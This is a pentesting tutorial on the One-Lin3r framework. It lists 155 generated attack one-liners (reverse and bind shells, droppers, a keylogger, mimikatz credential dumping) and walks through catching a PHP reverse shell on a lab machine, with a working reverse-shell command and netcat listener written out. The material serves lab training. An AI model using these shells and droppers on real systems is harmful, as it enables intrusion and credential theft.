A lot of time can be wasted performing trivial tasks over and over again, and it's especially true when it comes to hacking and penetration testing. Trying different shells to own a target, and testing out privilege escalation commands afterward, can eat up a lot of time. Fortunately, there is a tool called One-Lin3r that can quickly generate shells, privesc commands, and more.
One-Lin3r is a Python tool that acts as a framework to automate the generation one-liners commonly used in pentesting and hacking. Its usage is very similar to Metasploit, so it's natural and simple to pick up for most people. The tool contains features such as auto-complete, search suggestion, automatic copying, and smart searching, making it a breeze to find whatever you're looking for.
- Don't Miss: Hack UnrealIRCd Using Python Socket Programming
The first thing we need to do is install One-Lin3r. It requires Python 3, so the easiest way to do this is with pip3. It will install the tool along with any dependencies it may need.
~# pip3 install one-lin3r Collecting one-lin3r Downloading https://files.pythonhosted.org/packages/87/bc/603e4262e3e268e0e2ff54f7f87bbc638f5c4356f893396e2575379bc0cb/one_lin3r-2.0-py3-none-any.whl (100kB) 100% |████████████████████████████████| 102kB 1.4MB/s Collecting terminaltables (from one-lin3r) Downloading https://files.pythonhosted.org/packages/9b/c4/4a21174f32f8a7e1104798c445dacdc1d4df86f2f26722767034e4de4bff/terminaltables-3.1.0.tar.gz Requirement already satisfied: pyperclip in /usr/lib/python3/dist-packages (from one-lin3r) (1.6.4) Requirement already satisfied: prompt-toolkit in /usr/local/lib/python3.7/dist-packages (from one-lin3r) (2.0.9) Requirement already satisfied: wcwidth in /usr/local/lib/python3.7/dist-packages (from prompt-toolkit->one-lin3r) (0.1.7) Requirement already satisfied: six>=1.9.0 in /usr/lib/python3/dist-packages (from prompt-toolkit->one-lin3r) (1.12.0) Installing collected packages: terminaltables, one-lin3r Running setup.py install for terminaltables ... done Successfully installed one-lin3r-2.0 terminaltables-3.1.0
We can run the basic help menu by tacking on the -h flag:
~# one-lin3r -h usage: One-Lin3r.py [-h] [-r R] [-x X] [-q] optional arguments: -h, --help show this help message and exit -r R Execute a resource file. -x X Execute a specific command (use ; for multiples). -q Quiet mode (no banner).
One-Lin3r is a framework, so to really get into it, we need to start it up. Simply type one-lin3r in the terminal to do so:
~# one-lin3r zeeeeee- z$$$$$$" d$$$$$$" d$$$$$P d$$$$$P $$$$$$" .$$$$$$" .$$$$$$" 4$$$$$$$$$$$$$" z$$$$$$$$$$$$$" """""""3$$$$$" z$$$$P d$$$$" One-Lin3r By D4Vinci - V2.0 .$$$$$" A framework where all your liners belongs to... z$$$$$" Loaded 155 liner(s). z$$$$P d$$$$$$$$$$" *******$$$" .$$$" .$$" 4$P" z$" zP z" / ^ OneLiner >
Once it starts, we're greeted with a banner, much like what happens when starting the Metasploit Framework. In fact, most of the commands and usage of this tool are very similar to Metasploit, so most of us should feel right at home.
Typing help or ? will give us the detailed help menu:
OneLiner > ? Command Description -------- ------------- help/? Show this help menu. list/show List all one-liners in the database. search [Keywords..] Search database for a specific liner by its name, author name or description. use <liner> Use an available one-liner. copy <liner> Use an available one-liner and copy it to clipboard automatically. info <liner> Get information about an available liner. set <variable> <value> Sets a context-specific variable to a value to use while using one-liners. variables Prints all previously specified variables. banner Display banner. reload/refresh Reload the liners database. check Prints the core version and checks if you are up-to-date. history Display command-line most important history from the beginning. makerc Save command-line history to a file. resource <file> Run the commands stored in a file os <command> Execute a system command without closing the framework exit/quit Exit the framework
Since we are restricted to the framework prompt while running One-Lin3r, it's useful to be able to run operating system commands while working. Use the os keyword followed by whatever command you wish to run to do this:
OneLiner > os uname -a Linux drd 4.19.0-kali5-amd64 #1 SMP Debian 4.19.37-5kali1 (2019-06-20) x86_64 GNU/Linux
We can use the list command to display all of the available one-liners the tool has to offer. It will list the names and associated functions of each one.
OneLiner > list # | Name | Function -----+-------------------------------------------------------------+--------------- 1 | multi/nmap/slowloris_attack | Nmap script 2 | multi/nmap/google_malware_check | Nmap script 3 | multi/nmap/http_enumerate | Nmap script 4 | multi/nmap/full_vulnerability_scan | Nmap script 5 | multi/nmap/common_malware_scan | Nmap script 6 | multi/nmap/ftp_bruteforce | Nmap script 7 | openbsd/nc/bind_udp | Bind Shell 8 | openbsd/nc/reverse_tcp | Reverse Shell 9 | openbsd/bash/read_doas_config | PrivEsc 10 | windows/scan/check_netapi | Nmap script 11 | windows/scan/check_eternal_blue | Nmap script 12 | windows/python/bind_udp | Bind Shell 13 | windows/python/bind_tcp | Bind Shell 14 | windows/python/reverse_tcp | Reverse Shell 15 | windows/python/reverse_tcp_threaded | Reverse Shell 16 | windows/php/bind_udp | Bind Shell 17 | windows/php/bind_tcp | Bind Shell 18 | windows/powershell/meterpreter_shell | Reverse Shell 19 | windows/powershell/get_iis_config | PrivEsc 20 | windows/powershell/bind_tcp | Bind Shell 21 | windows/powershell/ps1_dropper_microsoft_syncappv | Dropper 22 | windows/powershell/list_installed_programs_using_registry | PrivEsc 23 | windows/powershell/reverse_tcp | Reverse Shell 24 | windows/powershell/setup_powerup_powertools | PrivEsc 25 | windows/powershell/ps1_dropper | Dropper 26 | windows/powershell/list_unqouted_services | PrivEsc 27 | windows/powershell/get_saved_wifi_passwords | PrivEsc 28 | windows/powershell/get_passwords_from_memory_using_mimikatz | PrivEsc 29 | windows/powershell/setup_keylogger_powersploit | Keylogger 30 | windows/powershell/list_running_processes | PrivEsc 31 | windows/powershell/ps1_dropper_rundll32 | Dropper 32 | windows/powershell/list_scheduled_tasks | PrivEsc 33 | windows/powershell/setup_session_gopher | PrivEsc 34 | windows/powershell/reverse_tcp_string | Reverse Shell 35 | windows/powershell/list_installed_programs_using_folders | PrivEsc 36 | windows/groovysh/reverse_tcp | Reverse Shell 37 | windows/cmd/bat_dropper | Dropper 38 | windows/cmd/hta_dropper_mshta | Dropper 39 | windows/cmd/list_logon_requirements | PrivEsc 40 | windows/cmd/dll_dropper_rundll32 | Dropper 41 | windows/cmd/read_registry_vnc_passwords | PrivEsc 42 | windows/cmd/read_registry_snmp_key | PrivEsc 43 | windows/cmd/read_registry_run_key | PrivEsc 44 | windows/cmd/read_registry_winlogon_key | PrivEsc 45 | windows/cmd/read_registry_r_key | PrivEsc 46 | windows/cmd/list_routing_tables | PrivEsc 47 | windows/cmd/exe_dropper_certutil | Dropper 48 | windows/cmd/list_startup_folder_currentuser | PrivEsc 49 | windows/cmd/search_registry_for_passwords_cu | PrivEsc 50 | windows/cmd/list_network_interfaces | PrivEsc 51 | windows/cmd/sct_dropper_rundll32 | Dropper 52 | windows/cmd/get_saved_wifi_aps_ssid | PrivEsc 53 | windows/cmd/list_users | PrivEsc 54 | windows/cmd/read_registry_putty_sessions | PrivEsc 55 | windows/cmd/get_systeminfo | PrivEsc 56 | windows/cmd/dll_dropper_regasm | Dropper 57 | windows/cmd/list_startup_tasks_with_wmic | PrivEsc 58 | windows/cmd/search_registry_for_passwords_lm | PrivEsc 59 | windows/cmd/execute_c#_files | Execute 60 | windows/cmd/list_user_privileges | PrivEsc 61 | windows/cmd/list_network_shares | PrivEsc 62 | windows/cmd/search_for_passwords | PrivEsc 63 | windows/cmd/read_services_with_tasklist | PrivEsc 64 | windows/cmd/runas_with_creds | Execute 65 | windows/cmd/list_unqouted_services | PrivEsc 66 | windows/cmd/read_services_with_wmic | PrivEsc 67 | windows/cmd/list_current_connections | PrivEsc 68 | windows/cmd/get_saved_wifi_passwords | PrivEsc 69 | windows/cmd/sct_dropper_mshta | Dropper 70 | windows/cmd/read_registry_runonce_key | PrivEsc 71 | windows/cmd/dll_dropper_certutil_base64 | Dropper 72 | windows/cmd/msi_quiet_installer | Execute 73 | windows/cmd/list_startup_folder_allusers | PrivEsc 74 | windows/cmd/sct_dropper_regsvr32 | Dropper 75 | windows/cmd/list_drives | PrivEsc 76 | windows/cmd/msi_dropper_wininstaller | Dropper 77 | windows/cmd/list_installed_updates | PrivEsc 78 | windows/cmd/list_localgroups | PrivEsc 79 | windows/cmd/list_running_processes | PrivEsc 80 | windows/cmd/read_firewall_config | PrivEsc 81 | windows/cmd/list_arp_tables | PrivEsc 82 | windows/cmd/xsl_dropper_wmic | Dropper 83 | windows/cmd/list_scheduled_tasks | PrivEsc 84 | windows/cmd/execute_over_forfiles | Execute 85 | windows/cmd/list_processes_running_as_system | PrivEsc 86 | windows/cmd/read_registry_always_install_elevated_key_cu | PrivEsc 87 | windows/cmd/exe_dropper_bitsadmin | Dropper 88 | windows/cmd/dll_loader_control_panel | Loader 89 | windows/cmd/win_remote_management | Execute 90 | windows/cmd/dll_loader_word | Loader 91 | windows/cmd/read_registry_always_install_elevated_key_lm | PrivEsc 92 | windows/cmd/get_snmp_config | PrivEsc 93 | windows/cmd/get_architecture | PrivEsc 94 | windows/nc/bind_tcp | Bind Shell 95 | windows/nc/reverse_tcp | Reverse Shell 96 | windows/lua/reverse_tcp | Reverse Shell 97 | windows/perl/bind_udp | Bind Shell 98 | windows/perl/bind_tcp | Bind Shell 99 | windows/perl/reverse_tcp | Reverse Shell 100 | windows/ruby/bind_udp | Bind Shell 101 | windows/ruby/bind_tcp | Bind Shell 102 | windows/ruby/reverse_tcp | Reverse Shell 103 | linux/awk/bind_tcp | Bind Shell 104 | linux/awk/reverse_tcp | Reverse Shell 105 | linux/awk/reverse_udp | Reverse Shell 106 | linux/java/reverse_tcp | Reverse Shell 107 | linux/go/reverse_tcp | Reverse Shell 108 | linux/python/bind_udp | Bind Shell 109 | linux/python/bind_tcp | Bind Shell 110 | linux/python/reverse_tcp | Reverse Shell 111 | linux/python/reverse_tcp_interactive | Reverse Shell 112 | linux/python/reverse_udp | Reverse Shell 113 | linux/php/bind_udp | Bind Shell 114 | linux/php/bind_tcp | Bind Shell 115 | linux/php/reverse_tcp | Reverse Shell 116 | linux/openssl/reverse_tcp | Reverse Shell 117 | linux/ncat/reverse_tcp_ssl | Reverse Shell 118 | linux/ncat/reverse_tcp | Reverse Shell 119 | linux/ncat/reverse_udp | Reverse Shell 120 | linux/socat/bind_udp | Bind Shell 121 | linux/socat/reverse_tcp | Reverse Shell 122 | linux/tclsh/reverse_tcp | Reverse Shell 123 | linux/nodejs/reverse_tcp | Reverse Shell 124 | linux/nc/reverse_tcp_mkfifo | Reverse Shell 125 | linux/nc/bind_tcp | Bind Shell 126 | linux/nc/reverse_tcp_mknod | Reverse Shell 127 | linux/nc/bind_tcp_mkfifo | Bind Shell 128 | linux/nc/reverse_tcp | Reverse Shell 129 | linux/nc/reverse_udp | Reverse Shell 130 | linux/lua/reverse_tcp | Reverse Shell 131 | linux/lua/reverse_tcp_bash | Reverse Shell 132 | linux/perl/bind_udp | Bind Shell 133 | linux/perl/reverse_udp_miosocket | Reverse Shell 134 | linux/perl/bind_tcp | Bind Shell 135 | linux/perl/reverse_tcp | Reverse Shell 136 | linux/perl/reverse_tcp_miosocket | Reverse Shell 137 | linux/telnet/reverse_tcp_mkfifo | Reverse Shell 138 | linux/telnet/reverse_tcp_mknod | Reverse Shell 139 | linux/ruby/bind_udp | Bind Shell 140 | linux/ruby/bind_tcp | Bind Shell 141 | linux/ruby/reverse_tcp | Reverse Shell 142 | linux/bash/list_cronjobs_for_another_user | PrivEsc 143 | linux/bash/list_cronjobs_for_current_user | PrivEsc 144 | linux/bash/list_all_capabilities | PrivEsc 145 | linux/bash/reverse_tcp | Reverse Shell 146 | linux/bash/exploit_docker_bash_container | PrivEsc 147 | linux/bash/search_for_password_using_grep | PrivEsc 148 | linux/bash/search_for_password_using_find | PrivEsc 149 | linux/bash/search_for_password_in_memory | PrivEsc 150 | linux/bash/exploit_writeable_sudoers | PrivEsc 151 | linux/bash/find_suid | PrivEsc 152 | linux/bash/reverse_tcp_exec | Reverse Shell 153 | linux/bash/list_cronjobs_for_all_users | PrivEsc 154 | linux/bash/list_systemd_timers | PrivEsc 155 | linux/bash/get_last_edited_files | PrivEsc
We can also search for specific items using the search command. This is something that One-Lin3r is really good at. It not only has auto-complete capabilities, but it also knows what you are trying to search for by offering suggestions and allowing partial search terms.
For instance, let's say we wanted some kind of PHP shell for Linux. We don't need to type the full path for the tool to find what we are looking for.
OneLiner > search linux php # | Name | Function -----+-----------------------+--------------- 1 | linux/php/bind_udp | Bind Shell 2 | linux/php/bind_tcp | Bind Shell 3 | linux/php/reverse_tcp | Reverse Shell
We can get information about a specific one-liner with the info command, which will give us a short description of the item, including its author, function, and variables that are used.
OneLiner > info linux/php/reverse_tcp [+] Liner added by => vesche [+] Function => Reverse Shell [+] Variables used => TARGET, PORT [+] Description => Uses PHP sockets & exec to create a reverse shell.
Once we've found a suitable item, we can load it with the use command:
OneLiner > use linux/php/reverse_tcp [+] Your liner is: php -r '$sock=fsockopen("TARGET",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
Once we do this, it will give us the actual line that we need to copy and run. In this example, we can see there are parameters for the target and port. To display current variables and their associated values, simply type variables at the prompt:
OneLiner > variables # | Name | Value ---+-----------+------- 1 | TARGET | None 2 | PORT | None 3 | URL | None 4 | COMMAND | None 5 | FILE_PATH | None 6 | USERNAME | None 7 | PASSWORD | None
Now we are able to set values for these variables, much like how we do in Metasploit. Since we are generating a reverse shell here, we need to set the target to the IP address of our local machine:
OneLiner > set target 10.10.0.1 [+] Variable target set to 10.10.0.1
And the desired port so it can connect back to our listener:
OneLiner > set port 4321 [+] Variable port set to 4321
Now when we display the variables again, we can see that our values are set:
OneLiner > variables # | Name | Value ---+-----------+----------- 1 | TARGET | 10.10.0.1 2 | PORT | 4321 3 | URL | None 4 | COMMAND | None 5 | FILE_PATH | None 6 | USERNAME | None 7 | PASSWORD | None
Let's try this out. First, we need to set up a listener so we can catch the incoming connection from the target. Netcat is always a good choice:
~# nc -lvp 4321 listening on [any] 4321 ...
Next, load the one-liner to get the full command. We can see that the target and port variables are now filled in with our values:
OneLiner > use linux/php/reverse_tcp [+] Your liner is: php -r '$sock=fsockopen("10.10.0.1",4321);exec("/bin/sh -i <&3 >&3 2>&3");'
We could just copy this command like normal, but One-Lin3r actually has a feature to automate this for us. Instead of loading an item with the use command, load it with the copy command — this will automatically copy what we need right to the clipboard:
OneLiner > copy linux/php/reverse_tcp [+] Your liner is: php -r '$sock=fsockopen("10.10.0.1",4321);exec("/bin/sh -i <&3 >&3 2>&3");' [+] Liner copied to clipboard successfully!
From here, it's time to exploit the target. Feel free to do this however you want, but command injection is always a favorite of mine. Once we exploit the target and run our reverse shell command, we should see a connection open up on our local machine:
10.10.0.50: inverse host lookup failed: Unknown host connect to [10.10.0.1] from (UNKNOWN) [10.10.0.50] 56718 sh: no job control in this shell sh-3.2$ id uid=33(www-data) gid=33(www-data) groups=33(www-data)
We can now run commands like id to verify we have compromised a user on the system.
Now that we have a shell on the system as a limited user, the next step to take would be privilege escalation. Fortunately, One-Lin3r also contains some handy privesc commands for us to generate.
First things first, let's upgrade this shell we have to a fully interactive TTY session so we have more control over what we're doing.
Now that we have a decent shell, let's find a potential privesc command to use. I usually like to work out of a world-writable directory during post-exploitation so I can write and execute whatever I want — /var/tmp is a good bet:
www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ cd /var/tmp
Now, back in One-Lin3r, we can search for an appropriate privesc for Linux:
OneLiner > search linux privesc # | Name | Function -----+-------------------------------------------+---------- 1 | linux/bash/list_cronjobs_for_another_user | PrivEsc 2 | linux/bash/list_cronjobs_for_current_user | PrivEsc 3 | linux/bash/list_all_capabilities | PrivEsc 4 | linux/bash/exploit_docker_bash_container | PrivEsc 5 | linux/bash/search_for_password_using_grep | PrivEsc 6 | linux/bash/search_for_password_using_find | PrivEsc 7 | linux/bash/search_for_password_in_memory | PrivEsc 8 | linux/bash/exploit_writeable_sudoers | PrivEsc 9 | linux/bash/find_suid | PrivEsc 10 | linux/bash/list_cronjobs_for_all_users | PrivEsc 11 | linux/bash/list_systemd_timers | PrivEsc 12 | linux/bash/get_last_edited_files | PrivEsc
Let's take a look at this one, which will list any cron jobs for the current user:
OneLiner > info linux/bash/list_cronjobs_for_current_user [+] Liner added by => Karim shoair (D4Vinci) [+] Function => PrivEsc [+] Variables used => None [+] Description => List all crob jobs for current user
Seems pretty straightforward, and we don't even need to set any variables. Use the copy command to copy it straight to the clipboard:
OneLiner > copy linux/bash/list_cronjobs_for_current_user [+] Your liner is: crontab -l [+] Liner copied to clipboard successfully!
We can see it still tells us what it generates, but we save an extra step by copying the command automatically. The only thing left to do is run the one-liner on the target:
www-data@metasploitable:/var/tmp$ crontab -l no crontab for www-data
We can see in this particular instance there are no cron jobs for this user, but One-Lin3r makes it easy to have some common privesc commands right at our fingertips.
Today, we explored a tool called One-Lin3r and how to use it to quickly generate shells, privilege escalation commands, and more. We tested it out by using a PHP reverse shell to compromise the target, then tried to escalate privileges by generating a command to check for cron jobs. With an interface that feels familiar to any Metasploit user, One-Lin3r makes it easy to hack on the fly.